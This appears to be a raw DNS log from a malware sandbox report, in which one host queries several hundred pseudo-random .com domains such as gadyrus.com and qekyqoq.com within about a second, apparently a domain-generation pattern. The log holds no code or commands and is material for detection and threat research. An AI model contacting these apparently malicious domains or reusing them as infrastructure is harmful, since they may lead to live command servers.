                                                                                                                                                                                                            Sep 8, 2024 09:00:32.230645895 CEST192.168.2.41.1.1.10xff5fStandard query (0)gadyrus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.231177092 CEST192.168.2.41.1.1.10x58e9Standard query (0)puzyceg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.231363058 CEST192.168.2.41.1.1.10xd3c2Standard query (0)lysywyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.233911037 CEST192.168.2.41.1.1.10xab70Standard query (0)galycah.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.233911037 CEST192.168.2.41.1.1.10xbaf4Standard query (0)qetyhov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.233911037 CEST192.168.2.41.1.1.10x9f5Standard query (0)vojyrum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.233911037 CEST192.168.2.41.1.1.10xe32cStandard query (0)vonygit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.233911037 CEST192.168.2.41.1.1.10x3bf0Standard query (0)qeqyhol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.233911991 CEST192.168.2.41.1.1.10x56eaStandard query (0)vowyjak.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.237330914 CEST192.168.2.41.1.1.10xdd66Standard query (0)lyvyver.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.237737894 CEST192.168.2.41.1.1.10x5230Standard query (0)gatyhos.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.238419056 CEST192.168.2.41.1.1.10x5059Standard query (0)pujytug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.238843918 CEST192.168.2.41.1.1.10x5dd9Standard query (0)qebyvyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.257297039 CEST192.168.2.41.1.1.10xbf99Standard query (0)vopyjac.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.257448912 CEST192.168.2.41.1.1.10xbbcfStandard query (0)pupyjap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.258627892 CEST192.168.2.41.1.1.10x5cc6Standard query (0)qekytig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.260452986 CEST192.168.2.41.1.1.10x7025Standard query (0)lykytin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.260626078 CEST192.168.2.41.1.1.10x6bc5Standard query (0)ganyvyw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.273396015 CEST192.168.2.41.1.1.10xd599Standard query (0)galypob.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.311527014 CEST192.168.2.41.1.1.10x8fcfStandard query (0)vonybuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.312026978 CEST192.168.2.41.1.1.10x1bf5Standard query (0)qedykep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.315844059 CEST192.168.2.41.1.1.10x2ba3Standard query (0)gadykyz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.316405058 CEST192.168.2.41.1.1.10x87a8Standard query (0)lymynuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.318108082 CEST192.168.2.41.1.1.10x76a7Standard query (0)pumybuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.320091963 CEST192.168.2.41.1.1.10xa807Standard query (0)vofykyt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.321826935 CEST192.168.2.41.1.1.10xe424Standard query (0)gaqynih.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.323683023 CEST192.168.2.41.1.1.10x23b9Standard query (0)lyxysad.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.325737953 CEST192.168.2.41.1.1.10x210fStandard query (0)lysyjex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.326831102 CEST192.168.2.41.1.1.10x9315Standard query (0)gacydes.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.332760096 CEST192.168.2.41.1.1.10x30fStandard query (0)qexysev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.336831093 CEST192.168.2.41.1.1.10xe286Standard query (0)lygylur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.337210894 CEST192.168.2.41.1.1.10xdf8cStandard query (0)vowymom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.337416887 CEST192.168.2.41.1.1.10x4c0aStandard query (0)purymog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.337573051 CEST192.168.2.41.1.1.10x767bStandard query (0)qeqyniq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.337711096 CEST192.168.2.41.1.1.10x78d7Standard query (0)lyryman.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.338219881 CEST192.168.2.41.1.1.10x72cStandard query (0)vocydyc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.338376999 CEST192.168.2.41.1.1.10xfe5cStandard query (0)qegylul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.339483023 CEST192.168.2.41.1.1.10x10aaStandard query (0)pufylul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.340056896 CEST192.168.2.41.1.1.10x4c46Standard query (0)gahyziw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.360260963 CEST192.168.2.41.1.1.10xcb5Standard query (0)vojyzik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.361185074 CEST192.168.2.41.1.1.10x66bbStandard query (0)vopyqef.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.361396074 CEST192.168.2.41.1.1.10x880eStandard query (0)puzypav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.361705065 CEST192.168.2.41.1.1.10x4ab9Standard query (0)qekyxaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.361871004 CEST192.168.2.41.1.1.10xe41eStandard query (0)pupywyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.362015009 CEST192.168.2.41.1.1.10xbbf4Standard query (0)pujyxoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.362145901 CEST192.168.2.41.1.1.10xa5b7Standard query (0)lykyxoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.362282991 CEST192.168.2.41.1.1.10x5767Standard query (0)qebyfup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.367908001 CEST192.168.2.41.1.1.10x35c3Standard query (0)ganyfuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.367923975 CEST192.168.2.41.1.1.10xa63Standard query (0)lyvyfux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.368108988 CEST192.168.2.41.1.1.10x8616Standard query (0)gatyqeb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.386800051 CEST192.168.2.41.1.1.10x85acStandard query (0)puvydyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.387073040 CEST192.168.2.41.1.1.10x7f76Standard query (0)qetyqag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.388775110 CEST192.168.2.41.1.1.10xfbf3Standard query (0)volypof.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.642985106 CEST192.168.2.41.1.1.10xcfd1Standard query (0)vocycat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.642985106 CEST192.168.2.41.1.1.10xcbb5Standard query (0)puvycel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.645539045 CEST192.168.2.41.1.1.10x673fStandard query (0)lyrygid.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.648135900 CEST192.168.2.41.1.1.10x7e2Standard query (0)lygywyj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.653779030 CEST192.168.2.41.1.1.10x4a70Standard query (0)vowyguf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.655828953 CEST192.168.2.41.1.1.10xce09Standard query (0)qexyxop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.657618046 CEST192.168.2.41.1.1.10x8e3bStandard query (0)gaqyfub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.657839060 CEST192.168.2.41.1.1.10xcc0eStandard query (0)lyxyxox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.658104897 CEST192.168.2.41.1.1.10x63bdStandard query (0)vofyqek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.658560038 CEST192.168.2.41.1.1.10xaeb9Standard query (0)gadyqaw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.658615112 CEST192.168.2.41.1.1.10xd54bStandard query (0)puzyxip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.659023046 CEST192.168.2.41.1.1.10x13e8Standard query (0)qeqyfug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.659823895 CEST192.168.2.41.1.1.10x9f32Standard query (0)lymyfyn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.660053015 CEST192.168.2.41.1.1.10xda25Standard query (0)ganydeh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.660269022 CEST192.168.2.41.1.1.10xa77fStandard query (0)pupymol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.660478115 CEST192.168.2.41.1.1.10x1b6dStandard query (0)qekyluv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.660769939 CEST192.168.2.41.1.1.10xb101Standard query (0)galyzus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.660928011 CEST192.168.2.41.1.1.10xd79Standard query (0)volyzic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.661215067 CEST192.168.2.41.1.1.10xc4daStandard query (0)gacycaz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.661410093 CEST192.168.2.41.1.1.10x10a0Standard query (0)qedyqal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.661696911 CEST192.168.2.41.1.1.10x4d69Standard query (0)pufyweq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.662281990 CEST192.168.2.41.1.1.10x95abStandard query (0)purygiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.663275957 CEST192.168.2.41.1.1.10x24a6Standard query (0)lysymor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.666224957 CEST192.168.2.41.1.1.10x8d21Standard query (0)pujylyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.666419029 CEST192.168.2.41.1.1.10xa362Standard query (0)vonydem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.675828934 CEST192.168.2.41.1.1.10x867aStandard query (0)gatyniz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.676026106 CEST192.168.2.41.1.1.10x7833Standard query (0)qetynup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.681413889 CEST192.168.2.41.1.1.10x18f7Standard query (0)gahykeb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.688604116 CEST192.168.2.41.1.1.10x6378Standard query (0)puvypoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.704194069 CEST192.168.2.41.1.1.10x14e8Standard query (0)purybup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.704626083 CEST192.168.2.41.1.1.10xc2dcStandard query (0)gacypiw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.707051992 CEST192.168.2.41.1.1.10xceStandard query (0)vocypok.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.707859039 CEST192.168.2.41.1.1.10xe6afStandard query (0)qegykeg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.708024025 CEST192.168.2.41.1.1.10xe62bStandard query (0)vopymit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.708129883 CEST192.168.2.41.1.1.10xaf6bStandard query (0)lyvysaj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.708308935 CEST192.168.2.41.1.1.10x27f3Standard query (0)pumydyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.708465099 CEST192.168.2.41.1.1.10xefa9Standard query (0)qexytil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.708816051 CEST192.168.2.41.1.1.10x60b3Standard query (0)lyrynux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.732443094 CEST192.168.2.41.1.1.10x117fStandard query (0)gahyruh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.732621908 CEST192.168.2.41.1.1.10xb8deStandard query (0)gaqyvys.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.732773066 CEST192.168.2.41.1.1.10x2844Standard query (0)vowybyc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.732956886 CEST192.168.2.41.1.1.10x942fStandard query (0)pufyjag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.737730026 CEST192.168.2.41.1.1.10xa1f0Standard query (0)pupyguq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.737903118 CEST192.168.2.41.1.1.10x64f6Standard query (0)lyxytur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.738806963 CEST192.168.2.41.1.1.10x63abStandard query (0)vopyguk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.738915920 CEST192.168.2.41.1.1.10xd2b0Standard query (0)vofyjom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.739048004 CEST192.168.2.41.1.1.10x41e7Standard query (0)lygyjan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.739223003 CEST192.168.2.41.1.1.10xab03Standard query (0)gadyhoh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.739387989 CEST192.168.2.41.1.1.10xe4c4Standard query (0)puzytul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.739715099 CEST192.168.2.41.1.1.10xf1a9Standard query (0)qeqyvev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.740091085 CEST192.168.2.41.1.1.10x2aaStandard query (0)vojykyf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.740396976 CEST192.168.2.41.1.1.10x5e86Standard query (0)qegyryq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.740572929 CEST192.168.2.41.1.1.10xa41fStandard query (0)volyrut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.740711927 CEST192.168.2.41.1.1.10xde03Standard query (0)pumycav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.740863085 CEST192.168.2.41.1.1.10xacc7Standard query (0)vonycaf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.740995884 CEST192.168.2.41.1.1.10x1e30Standard query (0)qedyhiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.741955996 CEST192.168.2.41.1.1.10x9fc0Standard query (0)lymyved.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.743262053 CEST192.168.2.41.1.1.10xc468Standard query (0)qebysaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.754663944 CEST192.168.2.41.1.1.10x1155Standard query (0)galyryz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.754746914 CEST192.168.2.41.1.1.10x9debStandard query (0)lysygij.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.754836082 CEST192.168.2.41.1.1.10xa383Standard query (0)qekyryp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.754931927 CEST192.168.2.41.1.1.10x43f0Standard query (0)lykywex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.755081892 CEST192.168.2.41.1.1.10x2084Standard query (0)ganycob.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.804500103 CEST192.168.2.41.1.1.10x5f7cStandard query (0)lykylud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.988615036 CEST192.168.2.41.1.1.10xe450Standard query (0)qebyxog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.989274979 CEST192.168.2.41.1.1.10x1f95Standard query (0)pujywep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.994102001 CEST192.168.2.41.1.1.10x8c18Standard query (0)puvytuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.995675087 CEST192.168.2.41.1.1.10x38c5Standard query (0)qetyveq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.996548891 CEST192.168.2.41.1.1.10x63aaStandard query (0)gatyveh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.998603106 CEST192.168.2.41.1.1.10xb6cdStandard query (0)lysyfed.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.000914097 CEST192.168.2.41.1.1.10x7e14Standard query (0)pumyxul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.001671076 CEST192.168.2.41.1.1.10x49a9Standard query (0)qedyfyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.002002954 CEST192.168.2.41.1.1.10x44eaStandard query (0)vojyjot.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.004462957 CEST192.168.2.41.1.1.10x316fStandard query (0)galyqoh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.021326065 CEST192.168.2.41.1.1.10x75e0Standard query (0)lyvytud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.021975040 CEST192.168.2.41.1.1.10xe2c7Standard query (0)qebytuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.023035049 CEST192.168.2.41.1.1.10xaf57Standard query (0)lysynun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.027122021 CEST192.168.2.41.1.1.10x3437Standard query (0)vonypic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.052907944 CEST192.168.2.41.1.1.10x47b4Standard query (0)galykew.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.059076071 CEST192.168.2.41.1.1.10xf21cStandard query (0)volykek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.059122086 CEST192.168.2.41.1.1.10x59e7Standard query (0)gadynub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.069127083 CEST192.168.2.41.1.1.10xbeeeStandard query (0)lymysox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.079066038 CEST192.168.2.41.1.1.10xe7d8Standard query (0)qetyfyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.081583023 CEST192.168.2.41.1.1.10xbef6Standard query (0)vojyqac.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.081846952 CEST192.168.2.41.1.1.10x6308Standard query (0)lyxywen.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.082611084 CEST192.168.2.41.1.1.10xe2Standard query (0)gatyfuw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.084146023 CEST192.168.2.41.1.1.10x5437Standard query (0)lykyjar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.086528063 CEST192.168.2.41.1.1.10x959fStandard query (0)pumypop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.086859941 CEST192.168.2.41.1.1.10x8eebStandard query (0)qegyqov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.087716103 CEST192.168.2.41.1.1.10x1f97Standard query (0)purydel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.087985039 CEST192.168.2.41.1.1.10xcf17Standard query (0)ganypis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.090462923 CEST192.168.2.41.1.1.10x8f6Standard query (0)qegyhip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.090713978 CEST192.168.2.41.1.1.10x7afStandard query (0)vopybym.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.091166019 CEST192.168.2.41.1.1.10x7bf3Standard query (0)lyryvaj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.096489906 CEST192.168.2.41.1.1.10xf5b5Standard query (0)gacyryb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.096656084 CEST192.168.2.41.1.1.10xa84fStandard query (0)lygygux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.112436056 CEST192.168.2.41.1.1.10xea76Standard query (0)vocyryf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.113472939 CEST192.168.2.41.1.1.10xc78fStandard query (0)lyryfyr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.113696098 CEST192.168.2.41.1.1.10xd077Standard query (0)pufygup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.113910913 CEST192.168.2.41.1.1.10xbab0Standard query (0)gahyqas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.114061117 CEST192.168.2.41.1.1.10x8327Standard query (0)qedynug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.114196062 CEST192.168.2.41.1.1.10x49acStandard query (0)gadyfys.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.114351034 CEST192.168.2.41.1.1.10x515Standard query (0)vofyguc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.114481926 CEST192.168.2.41.1.1.10xbb83Standard query (0)vocyzum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.118571997 CEST192.168.2.41.1.1.10xc5c1Standard query (0)puzywag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.118786097 CEST192.168.2.41.1.1.10x854Standard query (0)lygymod.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.119077921 CEST192.168.2.41.1.1.10x9680Standard query (0)vowydet.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.119232893 CEST192.168.2.41.1.1.10xbe83Standard query (0)lymyxir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.119308949 CEST192.168.2.41.1.1.10x476cStandard query (0)vofymif.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.119838953 CEST192.168.2.41.1.1.10xa562Standard query (0)lyvyxin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.120065928 CEST192.168.2.41.1.1.10x4664Standard query (0)volyqam.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.120213985 CEST192.168.2.41.1.1.10xfd04Standard query (0)qexyluq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.120511055 CEST192.168.2.41.1.1.10xa52Standard query (0)gacyzuh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.120678902 CEST192.168.2.41.1.1.10x626bStandard query (0)gaqycow.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.120853901 CEST192.168.2.41.1.1.10x3b9Standard query (0)vowycok.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.121129036 CEST192.168.2.41.1.1.10x47deStandard query (0)puvyxig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.121938944 CEST192.168.2.41.1.1.10x4f34Standard query (0)puzylyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.122144938 CEST192.168.2.41.1.1.10xf273Standard query (0)pufymiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.122472048 CEST192.168.2.41.1.1.10x851bStandard query (0)pupybyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.122711897 CEST192.168.2.41.1.1.10x3cbStandard query (0)lyxylyj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.122948885 CEST192.168.2.41.1.1.10xe031Standard query (0)qeqysap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.123151064 CEST192.168.2.41.1.1.10xc1c3Standard query (0)gaqydaz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.123375893 CEST192.168.2.41.1.1.10x6702Standard query (0)purycaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.123375893 CEST192.168.2.41.1.1.10x911fStandard query (0)pujyjol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.123729944 CEST192.168.2.41.1.1.10x7f5Standard query (0)qexyreg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.126499891 CEST192.168.2.41.1.1.10xfa2aStandard query (0)qekykal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.144645929 CEST192.168.2.41.1.1.10x91faStandard query (0)qeqyxil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.652930021 CEST192.168.2.41.1.1.10x35dcStandard query (0)qekyqoq.comA (IP address)IN (0x0001)false
